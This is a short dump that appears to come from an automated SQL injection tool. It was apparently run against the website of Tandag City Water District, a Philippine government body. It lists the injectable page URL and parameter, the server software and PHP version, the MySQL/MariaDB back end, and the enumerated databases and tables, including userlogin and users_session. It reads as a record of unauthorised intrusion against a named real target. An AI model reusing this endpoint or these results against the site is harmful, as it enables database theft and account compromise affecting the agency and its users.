.gov Government

.ph Philippines

Tandag Cıty Water District

Balilahan Mabua Tandag Cıty

https://tandagwd.gov.ph/pages.php?id=6

web application technology: LiteSpeed, PHP, PHP 5.5.38

the back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

available databases [2]:
[*] information_schema
[*] u526617281_twd

Database: u526617281_twd
[11 tables]
+------------------+
| groups           |
| articles         |
| biddings         |
| category         |
| membercategory   |
| pagecategory     |
| pages            |
| transparencyseal |
| uploads          |
| userlogin        |
| users_session    |
+------------------+
